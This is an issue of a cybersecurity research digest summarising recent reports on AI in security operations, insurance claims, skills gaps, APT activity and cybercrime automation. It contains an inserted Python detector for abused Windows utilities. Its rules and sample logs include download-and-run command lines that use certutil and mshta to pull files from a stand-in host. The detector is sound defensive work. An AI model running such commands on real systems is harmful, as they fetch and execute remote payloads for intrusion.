CRD #22
On diverging enthusiasm for AI in security, attack cost trends, workforce gaps, APT activity, and the latest in cybercrime ops.
The Cybersecurity Research Digest cuts through the marketing fluff and bias to bring you relevant and objective insights on cybersecurity stats and trends, all backed by empirical data.
This post features highlights from trustworthy research sources released between April 30 and May 19, 2025, followed by a list of all monitored reports.
TL;DR
- Executives see AI as a productivity boost, but analysts remain skeptical due to false positives and added complexity.
- BEC and funds transfer fraud dominate insurance claims, while ransomware remains the most costly.
- The workforce gap is driven by missing skills, not open roles, with salary the top retention factor.
- APT activity rose 45%, with Chinese groups heavily targeting telcos and evasion tactics evolving.
- Cybercrime is scaling fast via automation and AI, with massive growth in credential theft and exploit attempts.
Using AI for security: strategic enthusiasm, operational caution
A survey of over 1,000 cybersecurity professionals reveals a stark divide in how AI is perceived across organizational levels. While 71% of executives believe AI has significantly improved productivity, only 22% of frontline analysts agree. Analysts tend to see AI as reshaping, rather than reducing, their workload. Concerns cited include hallucinations, false positives, and increased complexity.
This divergence also appears in the willingness to let AI act autonomously. 38% of executives said they were open to this, compared to just 10% of analysts. While 38% is surprisingly high, it's important to note that the survey did not define what constitutes "AI", meaning the responses may not necessarily reflect willingness to adopt novel and still-maturing technologies based on LLMs. Regardless, the gap underscores the need for alignment between strategic vision and operational reality before depending on AI for critical capabilities.
Insurance data: BEC and funds transfer fraud dominate, ransomware most damaging
Data from cyber insurance claims filed with a global insurer in 2024 shows that both the frequency and severity of incidents have remained relatively stable compared to 2023. While the dataset is skewed towards insured organizations (which may thus be better prepared than the "average" organization), the trend points to year-over-year stability.
The data from 2024 shows that email-based threats remain dominant, with business email compromise (BEC) and funds transfer fraud (FTF) accounting for 60% of all claims.
Ransomware, though representing one-fifth of cases, carried significantly higher impact: average losses per incident reached $292,000, with 44% of victims opting to pay the ransom.
It’s a skills gap, not a headcount crisis
A global survey of 3,400 cybersecurity managers and HR professionals suggests the cyber workforce shortage is less about unfilled positions and more about the lack of necessary skills. The popular narrative - often amplified by certification companies - that "cyber offers endless career opportunities" is shifting: the focus is not on increasing headcount, but on finding people with the right competencies.
For employee retention as well as attraction, salary naturally remains the dominant factor by a wide margin. Other important elements include benefits, opportunities for upskilling, and a positive workplace culture.
Telcos in the crosshairs as Chinese APTs dominate detections
Threat detection data from Trellix covering October 2024 to April 2025 shows that APT-related activity increased 45% globally over the last two quarters. The telecommunications sector received the bulk of this activity - representing 47% of all detections - followed by transportation and shipping.
Telco targeting may relate to the fact that the Chinese groups APT40 and Mustang Panda were responsible for nearly half of all detected APT activity (think Salt Typhoon). As for Russian activity, Sandworm, the APT group known for targeting Ukrainian critical infrastructure, also showed increased activity.
The same reporting projects between 41,000 and 50,000 new CVEs in 2025. Despite the volume, phishing remains the top initial access vector, followed by exploitation of known vulnerabilities.
Once access is gained, threat actors heavily rely on legitimate system tools and living-off-the-land binaries (LOLBins). These are used to blend into normal operations, evade detection, and ensure redundancy. The research also points out that the use of memory-resident techniques, fileless malware, and signed binaries has overtaken custom malware.
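Because LOLBins are legitimate, signed system utilities, the detection problem described above is about context (which parent launched the binary, with what arguments) rather than the binary itself. The following is an added example, not code from the digest or from Trellix: a small Python detector that scans constructed process-creation log lines for a handful of well-known Windows LOLBins invoked with argument patterns commonly seen in abuse, and escalates a match when the parent is an Office application. The pipe-delimited log format, the rule set and the parent list are all assumptions for the example and would need tuning to a real environment.

```python
import re
from dataclasses import dataclass

# Hypothetical rule set: the binary names are well-known Windows LOLBins; the
# command-line regexes are illustrative heuristics, not a complete ruleset.
LOLBIN_RULES = {
    "certutil.exe": [r"-urlcache", r"-decode\b"],
    "rundll32.exe": [r"javascript:", r"\.dll,\s*\w+.*https?://"],
    "mshta.exe": [r"https?://", r"vbscript:", r"javascript:"],
    "regsvr32.exe": [r"/i:https?://", r"scrobj\.dll"],
    "bitsadmin.exe": [r"/transfer\b"],
}

# Parents that rarely launch download/scripting utilities in normal operations;
# a match under one of these is escalated (assumption, tune per environment).
SUSPICIOUS_PARENTS = {"winword.exe", "excel.exe", "outlook.exe",
                      "powerpnt.exe", "acrord32.exe"}


@dataclass
class Finding:
    host: str
    user: str
    image: str
    parent: str
    pattern: str
    severity: str
    command_line: str


def parse_line(line):
    """Parse one pipe-delimited process-creation record into a dict.

    Constructed format: timestamp|host|user|parent_image|image|command_line
    (command_line may itself contain '|', so split at most 5 times).
    Returns None for records that do not have exactly six fields.
    """
    parts = line.rstrip("\n").split("|", 5)
    if len(parts) != 6:
        return None
    keys = ("ts", "host", "user", "parent", "image", "cmdline")
    return dict(zip(keys, parts))


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def evaluate(record):
    """Return a Finding if the record matches a LOLBin rule, else None."""
    image = basename(record["image"])
    parent = basename(record["parent"])
    for pattern in LOLBIN_RULES.get(image, []):
        if re.search(pattern, record["cmdline"], re.IGNORECASE):
            severity = "high" if parent in SUSPICIOUS_PARENTS else "medium"
            return Finding(record["host"], record["user"], image, parent,
                           pattern, severity, record["cmdline"])
    return None


def scan(lines):
    """Run every parseable record through the rules; return the findings."""
    findings = []
    for line in lines:
        record = parse_line(line)
        if record is None:
            continue
        finding = evaluate(record)
        if finding is not None:
            findings.append(finding)
    return findings


# Constructed sample log lines (not real telemetry). The second and third
# records are written to trip a rule; the first and fourth are benign uses.
SAMPLE_LOG = [
    "2025-05-01T08:12:03Z|WS-017|corp\\jdoe|C:\\Windows\\explorer.exe|"
    "C:\\Windows\\System32\\certutil.exe|"
    "certutil.exe -hashfile C:\\Users\\jdoe\\setup.msi SHA256",
    "2025-05-01T08:15:41Z|WS-017|corp\\jdoe|"
    "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE|"
    "C:\\Windows\\System32\\certutil.exe|"
    "certutil.exe -urlcache -split -f http://203.0.113.10/update.txt "
    "C:\\Users\\jdoe\\AppData\\Local\\Temp\\u.txt",
    "2025-05-01T08:16:02Z|WS-017|corp\\jdoe|C:\\Windows\\System32\\cmd.exe|"
    "C:\\Windows\\System32\\mshta.exe|mshta.exe http://203.0.113.10/a.hta",
    "2025-05-01T09:02:10Z|SRV-DB01|corp\\svc_backup|"
    "C:\\Windows\\System32\\services.exe|"
    "C:\\Windows\\System32\\bitsadmin.exe|bitsadmin.exe /list",
    "malformed line without enough fields",
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"[{f.severity}] {f.host} {f.user} {f.parent} -> {f.image}: "
              f"matched {f.pattern!r}")
```

On the sample input the detector returns two findings: a high-severity one for certutil.exe fetching a URL under WINWORD.EXE, and a medium-severity one for mshta.exe launched from cmd.exe with a remote URL; the hash check and the bitsadmin listing pass through. The parent-process escalation is what keeps rules like these usable in practice: the same utilities run constantly in a healthy fleet, so a rule keyed on the binary alone produces exactly the false-positive load that analysts complain about, while pairing it with an unusual parent or a network-reaching argument narrows the alert to behaviour worth a triage.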
Crime-as-a-service expands rapidly, powered by AI and automation
Fortinet’s 2024 threat landscape report highlights explosive growth in the underground economy for stolen credentials and corporate access. Credential theft rose 42% year-over-year, with the use of infostealers like Redline and Vidar showing the most growth. Over 1.7 billion stolen credential records were shared on darknet forums, and Initial Access Broker (IAB) activity saw a notable rise in listings for VPN, RDP, and admin panel access.
Automation and operational scale continue to accelerate, with automated scanning reaching record highs in 2024, rising 16.7% globally. Exploitation activity also surged, with Fortinet tracking more than 97 billion attempts across the year. Despite the volume, the average time to exploit newly disclosed vulnerabilities held steady at 5.4 days, underscoring a sustained tempo rather than an accelerating one and offering a degree of reassurance to teams that have invested in automation for vulnerability management.
This accelerating automation trend is being, and will continue to be, supercharged by the growing role of AI in cybercriminal operations. Fortinet’s report underscores how tools such as FraudGPT, BlackmailerV3, and ElevenLabs are being used to generate malware, automate phishing websites, create deepfake content, and synthesize convincing audio. These capabilities amplify both the scale and sophistication of malicious campaigns, making them faster to launch, more believable, and harder to defend against.
Reports monitored: April 30 - May 19
To take a deeper dive into the topics most relevant for you, find below a list of all the monitored research reports (41) that were published during the observed period.
About
evisec's Cybersecurity Research Digest provides security leaders verified strategic insights via a carefully curated weekly summary of evidence-led, unbiased and objective cybersecurity research publications. Read more about our service here.
✉️ Suggestions or want to collaborate? Get in touch via LinkedIn or email (henry@evisec.xyz)